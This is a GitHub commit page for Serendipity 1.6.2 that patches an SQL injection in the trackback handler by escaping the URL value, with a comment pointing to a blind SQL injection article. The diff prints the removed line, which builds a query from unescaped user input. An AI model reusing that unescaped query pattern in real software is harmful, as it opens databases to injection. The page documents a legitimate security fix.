Browse files

* Fix SQL injection for comment.php used in read-context.

      (Thanks to High-Tech Bridge SA Security Release Lab, Advisory HTB23092)
  • Loading branch information...
1 parent a6f37ee commit 87153991d06bc18fe4af05f97810487c4a340a92 @garvinhicking garvinhicking committed May 16, 2012
Showing with 8 additions and 2 deletions.
  1. +6 −0 docs/NEWS
  2. +1 −1 include/functions_trackbacks.inc.php
  3. +1 −1 serendipity_config.inc.php
View
6 docs/NEWS
@@ -1,5 +1,11 @@
# $Id$
+Version 1.6.2 (May 16th, 2012)
+------------------------------------------------------------------------
+
+ * Fix SQL injection for comment.php used in read-context.
+ (Thanks to High-Tech Bridge SA Security Release Lab, Advisory HTB23092)
+
Version 1.6.1 (May 8th, 2012)
------------------------------------------------------------------------
View
2 include/functions_trackbacks.inc.php
@@ -364,7 +364,7 @@ function add_trackback ($id, $title, $url, $name, $excerpt) {
if ($id>0) {
// first check, if we already have this trackback
- $comments = serendipity_fetchComments($id,1,'co.id',true,'TRACKBACK'," AND co.url='$url'");
+ $comments = serendipity_fetchComments($id,1,'co.id',true,'TRACKBACK'," AND co.url='" . serendipity_db_escape_string($url) . "'");
if (is_array($comments) && sizeof($comments) == 1) {
log_pingback("We already have that TRACKBACK!");
return 0; // We already have it!
View
2 serendipity_config.inc.php
@@ -45,7 +45,7 @@
}
// The version string
-$serendipity['version'] = '1.6.1';
+$serendipity['version'] = '1.6.2';
// Setting this to 'false' will enable debugging output. All alpa/beta/cvs snapshot versions will emit debug information by default. To increase the debug level (to enable Smarty debugging), set this flag to 'debug'.
$serendipity['production'] = (preg_match('@\-(alpha|beta|cvs)@', $serendipity['version']) ? false : true);

1 comment on commit 8715399

@q--

Since the bug has been fixed for half a year or so, I don't think it can cause any harm to link a page at the Microsoft Developer Network that explains how blind SQL injection holes are actually exploited: Time-Based Blind SQL Injection with Heavy Queries.

Also note that tools to automate this process are widely available.

Please sign in to comment.